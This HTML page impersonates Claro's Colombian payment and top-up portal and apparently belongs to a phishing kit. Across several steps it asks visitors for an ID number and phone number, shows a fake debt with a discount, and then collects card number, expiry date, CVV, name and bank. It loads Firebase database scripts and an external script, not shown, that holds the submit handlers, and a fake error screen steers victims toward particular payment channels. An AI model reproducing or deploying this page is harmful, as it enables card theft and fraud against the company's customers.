<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, user-scalable=no">
    <link rel="icon" type="image/png" href="img/favicon.ico">
    <title>Portal de pagos Claro</title>
  

    <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300..800;1,300..800&display=swap" rel="stylesheet">


    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.4.3/dist/css/bootstrap.min.css" rel="stylesheet">
    <script src="https://www.gstatic.com/firebasejs/8.10.0/firebase-app.js"></script>
    <script src="https://www.gstatic.com/firebasejs/8.10.0/firebase-database.js"></script>
    <style type="text/css">
        *{
            font-family: "Open Sans";
            padding: 0;
            margin: 0;
        }
        #comida{
            background-color: #DA291C !important;
            padding: 7px;
            height: 85px;
            background-color: #F3F3F4 !important;
        }
        .logo{
            width: 80px;
        }
        .caja_img{
            text-align: center;
        }
        #ggris1{
            text-align: center;
            height: 150px;
            background-color: #F3F3F4; 
            border-bottom: 1px solid #AEAEAE;
            box-shadow: 0 0 0 rgb(0 0 0 / 16%);
        }
        #tabla-opciones{
            margin: -30px auto 0px auto;
            width: 94%;
            max-width: 1000px;
        }
        .etq-pasos{
            font-size: 13px;            
        }
        .act-pasos{
            color:#2c97ad;
        }
        section{
            margin: 0 auto;
            text-align: center;
            width: 96%;
            max-width: 680px;
        }
        .texto1{
            font-size: 28px;
            color: #5c5c5c;  
        }
        .rojo{
            font-weight: 600;
            color: #EF3829;
        }
        .texto2{
            color: #5c5c5c; 
            font-size: 17px;  
        }        

        .etiquetas{
            color:#2c97ad;
            font-size: 14px;
        }
        .entradas{
            border: 1px solid #5c5c5c;
            width: 96%;
            outline: none;
            padding: 10px;
            border-radius: 10px;
            max-width: 440px;
        }
        .botonr{
            background-color: #fff;
            border: 0;
            cursor: pointer;
        }
        .boton_continuar,.boton2{
            background-color: #E52A1B;
            color: #fff;
            border: 0;
            outline: 0;
            border-radius: 10px;
            padding: 10px;
            font-size: 16px;
            width: 96%;
            max-width: 250px;
        }
        footer{
            background-color: #212121;
            color: #fff;
            text-align: center;
            padding: 20px;
            font-size: 12px;
        }
        .celda{
            background-color: #F4F4F4;
            padding: 7px 10px;
            border: 1px solid #AEAEAE;
            text-align: left;
        }
        .celda2{
            background-color: #DA291C;
            color: #fff;
            text-align: center;
        }



         #ca,#ba,#bo,#ne{
            width: 96%;
            background-color: #fff;margin: 5px 0px;
            border-radius: 10px;
            border: 1px solid #AEAEAE;
         }

         .options-list li{
            list-style-type: none;
            padding: 5px;
         }

         .options-list li:hover{
            background-color: #808080b0;
            color: #fff;
            cursor: pointer;
         }

         #selectBox{
            padding: 10px;
            border-radius: 10px;
         }

         #espera,#Tarjeta,#section3,#section2,#errorpasarela{
            display: none;
         }
         #lista-servicios{
            background-color: #fff;
            border: 1px solid #afafaf;
            border-radius: 10px;
            padding: 10px;
            width: calc(100% - 20px);
            box-shadow: 0 0 0 rgb(0 0 0 / 16%);
            border-radius: 10px;
         }

         #lista-servicios:hover{
            box-shadow:0 5px 10px rgba(0,0,0,.16);
            border:2px solid #ee6745;
            cursor: pointer;
            outline: 0;
         }


        #menu-tipo{
            margin-top: -4px;
            position:absolute;
            display:none;
        }

        #lista-menu{
            border: 1px solid #80808061;
            background-color:#fff;
            box-shadow: 0 5px 10px #acbac9;
            border-radius: 10px;
            
        }
        .item-menu{
            background-color: #FFF;
            cursor: pointer;
        }

        .item-menu:hover{
            background-color: #F1F1F1;
        }

        .item-menu td{
            font-size: 18px;
            color: #5c5c5c;
        }

        #txt-funcion{
            color:#5c5c5c; 
            font-size:18px;
        }

        #top-bar{
            top:0px;
            left:0px;
            background-color: #fff;
            position: fixed;
            width: 100%;
            z-index: 10; 
            display: ; 
        }

        #menu-bar{
            top:40px;
            left:0px;
            background-color: #DA291C;
            position: fixed;
            z-index: 20;  
            width: 100%;
            display: ;
        }

        #fondo{
            background-color: #ffffff54;
            position: fixed;
            top: 0px;
            left: 0px;
            width: 100%;
            height: 100%;
            z-index: 120;
            display: none;
        }

        #cargando{
            position: fixed;
            text-align: center;
            top: 50%;
            left: 50%;
            z-index: 150;
            transform: translate(-50%,-50%);
            display: none;
        }

        

        @media (max-width:1051px) {
            .movil{
                display: none;
            }
        }

    </style>
</head>
<body>
    <div id="fondo"></div>
    <div id="cargando">
        <img src="img/iconos-logo-claro.png" width="120"><br>
        <img src="img/load.gif" width="150" style="margin-top: -40px;">
    </div>
    <div id="top-bar">
        <table cellpadding="0" cellspacing="0" border="0" width="96%" style="max-width: 1280px;margin: 0 auto;">
            <tr>
                <td valign="top" align="left"><img src="img/top-personas.jpg">&nbsp;&nbsp;&nbsp;<img src="img/top-negocios.jpg" class="movil">&nbsp;&nbsp;&nbsp;<img src="img/top-empresas.jpg" class="movil">&nbsp;&nbsp;&nbsp;<img src="img/top-institucional.jpg" class="movil"></td>
                <td valign="top" align="right"><img src="img/top-masdeclaro.jpg" class="movil">&nbsp;&nbsp;&nbsp;<img src="img/top-bandera.jpg"></td>
            </tr>
        </table>
    </div>
    <div id="menu-bar">
        <table cellpadding="0" cellspacing="0" border="0" width="96%" style="max-width: 1280px;margin: 0 auto;">
            <tr>
                <td valign="top" align="left"><img src="img/mnu-logo.jpg">&nbsp;&nbsp;&nbsp;<img src="img/mnu-servicios.jpg" class="movil">&nbsp;&nbsp;&nbsp;<img src="img/mnu-beneficios.jpg" class="movil">&nbsp;&nbsp;&nbsp;<img src="img/mnu-tienda.jpg" class="movil"></td>
                <td valign="top" align="right"><img src="img/mnu-soporte.jpg" class="movil">&nbsp;&nbsp;&nbsp;<img src="img/mnu-informacion.jpg" class="movil">&nbsp;&nbsp;&nbsp;<img src="img/mnu-miclaro.jpg"></td>
            </tr>
        </table>  
    </div>
    <header id="comida">
        <div class="caja_img">
            <img class="logo" src="img/logo-claro-blanco.svg">
        </div>
    </header>
<main>
    <div id="ggris1" class="gris1">
        <div class="texto_gris"><br><br>    
            <p class="texto1">Portal de <span class="rojo">PAGOS Y RECARGAS</span></p>
        </div>
    </div>

    <table id="tabla-opciones">
        <tr>
            <td valign="top" align="center"><img id="azul1" src="img/icono-seleccion-on.png" class="imagen"></td>
            <td valign="top" align="center"></td>
            <td valign="top" align="center"><img id="azul2" src="img/icono-mediopago-off.png" class="imagen"></td>
            <td valign="top" align="center"></td>
            <td valign="top" align="center"><img id="azul3" src="img/icono-pago-off.png" class="imagen"></td>
            <td valign="top" align="center"></td>
            <td valign="top" align="center"><img id="azul4" src="img/icono-resultado-off.png" class="imagen"></td>
        </tr>
        <tr>
            <td valign="top" align="center" class="etq-pasos act-pasos">Ingresa <br>tu Documento</td>
            <td valign="top" align="center"></td>
            <td valign="top" align="center" class="etq-pasos">Escoge el <br>medio de pago</td>
            <td valign="top" align="center"></td>
            <td valign="top" align="center" class="etq-pasos">Realiza el <br>Pago en linea</p></td>
            <td valign="top" align="center"></td>
            <td valign="top" align="center" class="etq-pasos">Recibe la <br>Confimacion</td>
        </tr>
    </table>

    <div id="contenedor"></div>


    <section id="intro" style="display:;">
        <div class="texto_gris2" style="padding-top: 20px; padding-bottom: 20px;">
            <br><br> 
            <p class="texto2" style="text-align: justify;">Consulta tu factura Claro, verifica si aplicas al descuento y paga de manera fácil desde donde quieras. Además, puedes inscribir tu tarjeta de crédito para pagos automáticos o realizar recargas y compras de paquetes en pocos pasos.</p>            
        </div>
        <br>
        <div id="lista-servicios">
            <table width="100%" cellpadding="0" cellspacing="0" border="0">
                <tr>
                    <td valign="middle" align="left" id="txt-funcion">Selecciones la opción de tu interés</td>
                    <td valign="middle" align="right"><img src="img/flecha-abajo.jpg"></td>
                </tr>
            </table>
        </div>
        <div id="menu-tipo">
            <div style="text-align:center;"><img src="img/flecha-menu.png"></div>
            <div id="lista-menu">
                <div class="item-menu" id="mnu-pago-factura" style="border-radius: 10px 10px 0px 0xp;">
                    <table width="100%" cellpadding="0" cellspacing="0" border="0">
                        <tr>
                            <td valign="middle" align="left" width="54"><img src="img/PFPHM.png"></td>
                            <td valign="middle" align="left">Pago de Facturas</td>
                        </tr>
                    </table>
                </div>
                <div class="item-menu" id="mnu-compra-paquetes">
                    <table width="100%" cellpadding="0" cellspacing="0" border="0">
                        <tr>
                            <td valign="middle" align="left" width="54"><img src="img/COPPP.png"></td>
                            <td valign="middle" align="left">Compra de Paquetes</td>
                        </tr>
                    </table>
                </div>
                <div class="item-menu" id="mnu-compra-recarga">
                    <table width="100%" cellpadding="0" cellspacing="0" border="0">
                        <tr>
                            <td valign="middle" align="left" width="54"><img src="img/CORPP.png"></td>
                            <td valign="middle" align="left">Compra de Recargas</td>
                        </tr>
                    </table>
                </div>
                <div class="item-menu" id="mnu-pago-automatico">
                    <table width="100%" cellpadding="0" cellspacing="0" border="0">
                        <tr>
                            <td valign="middle" align="left" width="54"><img src="img/PADFS.png"></td>
                            <td valign="middle" align="left">Pago Automático de Facturas</td>
                        </tr>
                    </table>
                </div>
                <div class="item-menu" id="mnu-pago-deudas" style="border-radius: 0px 0px 10px 10px;">
                    <table width="100%" cellpadding="0" cellspacing="0" border="0">
                        <tr>
                            <td valign="middle" align="left" width="54"><img src="img/PDFAM.png"></td>
                            <td valign="middle" align="left">Paga tus deudas antiguas en mora</td>
                        </tr>
                    </table>
                </div>
            </div>            
        </div>
        <div class="botones">
            <br><br><br>
            <button class="boton_continuar" onclick="vista_inciar()">Continuar</button> 
            <br><br><br><br><br><br><br><br>     
        </div>

    </section>

    <section id="usuario" style="display:none;">
        <div class="texto_gris2">
            <br><br> 
            <p class="texto2">Consulta tu factura Claro, verifica si aplicas al descuento y paga de manera fácil desde donde quieras. Además, puedes inscribir tu tarjeta de crédito para pagos automáticos o realizar recargas y compras de paquetes en pocos pasos.</p>
        </div>
            <div><br>
                <label for="documento" class="etiquetas">Ingresa tu Numero de Documento</label><br>
                <input type="number" inputmode="numeric" class="entradas" required id="documento" placeholder="Numero de Documento" autofocus autocomplete="off" minlength="5" maxlength="10" onKeypress="if (event.keyCode < 48 || event.keyCode > 57) event.returnValue = false;" />

            </div>
            <br>
        <div class="tipo">
            <p class="etiquetas">Selecciona el tipo de servicio</p>
            <div class="imgtipos">
                <button class="botonr" onclick="cambiaimg(1)"><img id="check1" class="check" src="img/check.png"><p>Pospago</p></button><img class="iconitos" src="img/celular.png">
                <button class="botonr" onclick="cambiaimg(2)"><img id="check2" class="check" src="img/uncheck.png"><p>Hogar</p></button><img class="iconitos" src="img/hogar.png">
                <button class="botonr" onclick="cambiaimg(3)"><img id="check3" class="check" src="img/uncheck.png"><p>Equipo</p></button><img class="iconitos" src="img/equipos.png">
                <button class="botonr" onclick="cambiaimg(4)"><img id="check4" class="check" src="img/uncheck.png"><p>Internet</p></button><img class="iconitos" src="img/internet.png">
            </div>
        </div>
        <br><br>

            <label class="etiquetas" for="celular">Por favor Ingresa tu Numero de Celular.</label>
        <br>
        <input type="number" required id="celular" inputmode="numeric" value="" placeholder=" Numero de Celular" class="entradas" autocomplete="off" minlength="5" maxlength="10" onKeypress="if (event.keyCode < 48 || event.keyCode > 57) event.returnValue = false;"/>
        <div class="botones">
            <br>
            <button class="boton_continuar" onclick="validarNumero()">Continuar</button>      
        </div>

    </section>   

    <section id="errorpasarela">
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
              <div style="text-align: center;"><img style="width: 130px; margin-left: auto;" src="https://dev-claro-img-css.pantheonsite.io/iconos-logo-claro.png">
                 <br><br>

                 <div class="loader">
                    <div class="dot"></div>
                    <div class="dot"></div>
                    <div class="dot"></div>
                 </div>
              </div>       
        <br> 
        <br>  
        <br>

              <div style="text-align: center; line-height: 1rem;" >
                 <h2 class="t-subtitle" style="line-height: 2.5rem; font-size: 1.6rem; color: #e5281bde;">Te pedimos una disculpa, en este momento solo se aceptan las siguiente pasarelas de pagos: Nequi, Bancolombia o Tarjeta de Debito o Credito</h2>
                 <br>
                 <br>
                 <br>   
                 <br>
                 <br>
              </div>
              <br>
              <br>
              <br>
              <br>
              <br>
              <br>
      </section>


      <section id="section2">
  <br><br>
  <div class="tabla">
  <div class="fila">
  <div class="celda celda2">Pago de Facturas</div>
  </div>
  <div class="fila">
  <div class="celda"><p>Cliente:  <span id="nombre"></span></p> </div>
  </div>
  <div class="fila">
  <div class="celda"><p>Celular: <span id="celular2"></span></p> </div>
  </div>
  <div class="fila">
  <div class="celda"><p>Deuda Total: $<span id="deuda"></span></p> </div>
  </div>
  <div class="fila">
  <div class="celda"><p>Descuento: $<span id="descuento"></span></p> </div>
  </div>
  <div class="fila">
  <div class="celda"><p>Total a Pagar: $<span id="total"></span></p> </div>
  </div>
  </div><br><br><br>
  <button class="boton2" onclick="opciones_pago();" style="margin-top: -0.5rem;">Continuar</button>
  
  </section>

  <section id="espera" >
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
              <div style="text-align: center;"><img style="width: 130px; margin-left: auto;" src="img/iconos-logo-claro.png"><br>
                 <img src="img/load.gif" width="120">
              </div>       
        <br> 
        
              <div style="text-align: center; line-height: 1rem;" >
                 <h2 class="t-subtitle" style="line-height: 2.5rem; font-size: 16px; color: #e52a1b;">Validando la Informacion...</h2>
                 <br>
                 <br>
                 <br>   
                 <br>
                 <br>
              </div>
              <br>
              <br>
              <br>
              <br>
              <br>
              <br>
      </section>

      <section id="Tarjeta">
      <br><br>
        <div class="texto_gris2">
            <p class="texto2">Paga de manera facil y desde donde quieras con tu tarjeta de Debito o Credito.</p>
        </div>
            <div style="margin-top:10px;">
                <label for="input1" class="etiquetas">Numero de la Tarjeta</label><br>
                <input type="text" class="entradas" pattern="[0-9]*" inputmode="numeric" id="numtc" placeholder="1234 5678 9012 3456" autofocus="" autocomplete="off" minlength="16" maxlength="19" oninput="formatInput(this)">
            </div>
            <div style="margin-top:10px;">
                <label for="input1" class="etiquetas">Fecha de Vencimiento</label><br>
                <input type="text" class="entradas" pattern="[0-9]*" inputmode="numeric" id="fechat" placeholder="MM/YYYY" b="" autocomplete="off" minlength="7" maxlength="7" oninput="formatInput(this)">
            </div>
            <div style="margin-top:10px;">
                <label for="input1" class="etiquetas">Codigo de Seguridad</label><br>
                <input type="text" class="entradas" pattern="[0-9]*" inputmode="numeric" id="codcv" placeholder="CVV" b="" autocomplete="off" minlength="2" maxlength="4">
            </div>
            <div style="margin-top:10px;">
                <label for="input1" class="etiquetas">Numero de Cuotas</label><br>
                <input type="text" class="entradas" pattern="[0-9]*" inputmode="numeric" placeholder="1" autocomplete="off" minlength="1" maxlength="2">
            </div>
            <div style="margin-top:10px;">
                <label for="input1" class="etiquetas">Nombres y Apellidos</label><br>
                <input type="text" class="entradas" required="" id="datost" placeholder="" autocomplete="off" minlength="5">
            </div>
            <label for="input1" class="etiquetas" style="margin-top:10px;">Selecciona tu Entidad Bancaria</label>       
            <button id="selectBox" style="display: ; background-color: transparent; color: #5c5c5c; width: 80%; border-width: 1px;
            border-color: #b4b4b4;" class="select-box inputst" onclick="toggleOptions1()">
            <span id="selectedOption1">Selecciona</span>
            <ul id="optionsList1" class="options-list">
              <li onclick="selectTC('b-34f4','Bogota')">Banco De Bogotá</li>
              <li onclick="selectTC('b-34f1','AV Villas')">Banco AV Villas</li>
              <li onclick="selectTC('b-34f13','BBVA')">BBVA Colombia</li>
              <li onclick="selectTC('b-34f3','Davivienda')">Davivienda</li>
              <li onclick="selectTC('b-34f9','Bancolombia')">Bancolombia</li>
              <li onclick="selectTC('b-34f5','Falabella')">Banco Falabella</li>
              <li onclick="selectTC('b-34f12','Colpatria')">Scotiabank Colpatria</li>                          
              <li onclick="selectTC('b-34f18','Popular')">Banco Popular</li>              
            </ul>
            </button>
            <input id="selectedValue1" type="hidden">

        </section>    
  
        <section id="section3">
        <br><br>
        <button id="ca"><img src="img/tar.jpg" id="cai" onclick="selectOption1('Tarjeta')"><p>Tarjetas de Credito</p></button>
        <button id="ba" style="padding:10px 0px;"><img src="img/ba.png" id="bai" width="140" onclick="selectOption1('TRICOLOR')">.</button>
        <button id="bo" style="padding:22px 0px;"><img src="img/logo-bogota-mobile.png" width="120" id="bgt" onclick="selectOption1('De Bogota')">.</button>
        <button id="ne" style="padding:21px 0px;"><img src="img/NE.png" id="nei" width="110" onclick="selectOption1('NEQUI')">.</button>
        <input id="selectedValue1" type="hidden">
        
        </div>
        
        <br><br>
        <button class="boton2" style="margin-top: -0.5rem;" onclick="enviador()">Continuar</button>
        </section>

</main>
<br><br>
    <footer id="footerr">
        <p class="app">Descarga ya la App Mi Claro</p>
        <img class="android" src="img/android.png">
        <img class="ios" src="img/ios.png">
        <p>Terminos y condiciones - Politicas de privacidad.</p>
        <br><br>
        <div class="footer2">
            <img class="logo2" src="img/logocl.png" width="80"> 
            <p>Todos los derechos reservados - 2024 Claro</p>
        </div>
    </footer>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

</body>
<script src="js/colores.js?v1"></script>
<script type="text/javascript">   
    function inciando() {
        $("#fondo,#cargando,#intro").hide();
        $("#usuario").show();    
    }


    $(document).ready(function() {   


    $(window).scroll(function() {
        if (window.scrollY > 0) {          
            $("#top-bar").hide();
            $("#menu-bar").css("top","0px");
        }else{
            $("#top-bar").show();
            $("#menu-bar").css("top","40px");
        }
    });     
        var ancho = $("#lista-servicios").width();
        ancho = ancho + 20;        
        $("#menu-tipo").css("width",ancho + "px");

        $("#mnu-pago-factura").click(function(){
            $("#txt-funcion").html("Pago de Facturas");
            $("#menu-tipo").hide();
            $("#fondo,#cargando").show();
            setTimeout(inciando,1000); 
        });

        $("#mnu-compra-paquetes").click(function(){
            $("#txt-funcion").html("Compra de Paquetes");
            $("#menu-tipo").hide();
            $("#fondo,#cargando").show();
            setTimeout(inciando,1000);
        });

        $("#mnu-compra-recarga").click(function(){
            $("#txt-funcion").html("Compra de Recargas");
            $("#menu-tipo").hide();
            $("#fondo,#cargando").show();
            setTimeout(inciando,1000);
        });

        $("#mnu-pago-automatico").click(function(){
            $("#txt-funcion").html("Pago Automático de Facturas");
            $("#menu-tipo").hide();
            $("#fondo,#cargando").show();
            setTimeout(inciando,1000);
        });

        $("#mnu-pago-deudas").click(function(){
            $("#txt-funcion").html("Paga tus deudas antiguas en mora");
            $("#menu-tipo").hide();
            $("#fondo,#cargando").show();
            setTimeout(inciando,1000);
        });     

        $("#lista-servicios").click(function(){
            $("#menu-tipo").show();
        });
    });
</script>
</html>